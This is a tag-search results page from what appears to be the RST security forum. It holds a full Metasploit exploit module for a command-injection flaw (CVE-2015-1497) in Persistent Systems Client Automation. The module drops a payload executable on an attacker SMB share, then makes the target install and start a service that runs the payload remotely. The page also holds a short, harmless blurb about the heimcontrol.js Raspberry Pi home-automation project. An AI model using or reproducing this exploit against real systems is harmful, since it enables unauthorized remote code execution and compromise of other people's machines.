Jump to content

Search the Community

Showing results for tags 'automation'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 2 results

  1. # Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability # Date: 2014-10-01 # Exploit Author: Ben Turner # Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/ # Version: 7.9, 8.1, 9.0, 9.1 # Tested on: Windows XP, Windows 7, Server 2003 and Server 2008 # CVE-2015-1497 # CVSS: 10 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::Client XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability', 'Description' => %Q{ This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. }, 'Author' => [ 'Ben Turner' ], 'License' => BSD_LICENSE, 'References' => [ ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process' }, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'January 10 2014' ) register_options([ OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']), OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']), Opt::RPORT(3465), ], self.class) end def exploit createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\"" createservice << "\x22\x00\x00\x00" startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" startservice << "Nvdkit service start test" startservice << "\x22\x00\x00\x00" removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" removeservice << "Nvdkit service remove test" removeservice << "\x22\x00\x00\x00" def filedrop() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") exe = generate_payload_exe fd = smb_open("\\installservice.exe", 'rwct') fd << exe fd.close self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end def filetest() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") file = "\\installservice.exe" filetest = smb_file_exist?(file) if filetest print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n") else print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!") end self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end begin filedrop() filetest() connect() sock.put(createservice) print_status("Creating the callback payload and installing the remote service") disconnect sleep(5) connect() sock.put(startservice) print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service") disconnect sleep(30) connect sock.put(removeservice) disconnect rescue ::Exception => e print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") abort() end end end
  2. Awesome home automation with Raspberry PI and Arduino using Node.js, MongoDB, HTML5 and Websockets. Responsive: The responsive design allows you comfortable control of your home devices using your smartphone or tablet. Everywhere: Open your Raspberry PI to the world and access your home automation app from everywhere in the world. Extendable: An elaborated plugin system makes it easy to extend the application with your own plugins. Features: heimcontrol.js was created to gain experience in Node.js, MongoDB, Websockets and a lot of other great technologies that were used in the project. Take a look in the package.json for a full list of used open source projects. The project is in active development and a very early prototype, so use it at your own risk! Hardware: - Full access to the GPIO of the Raspberry Pi - Communication with an attached Arduino - Wake-on-LAN (not really hardware, but at least it wakes up hardware) - Stream your webcam via socket.io Software: - Node.js, Socket.io, Expressjs, Requirejs - HTML5, CSS3 and Websockets - Jade templating - Responsive design Apps: Heimdroid (Android Application): Heimdroid Video: Source: heimcontrol.js - Home automation in Node.js with Raspberry PI and Arduino Get started: heimcontrol.js - Home automation in Node.js with Raspberry PI and Arduino
×
×
  • Create New...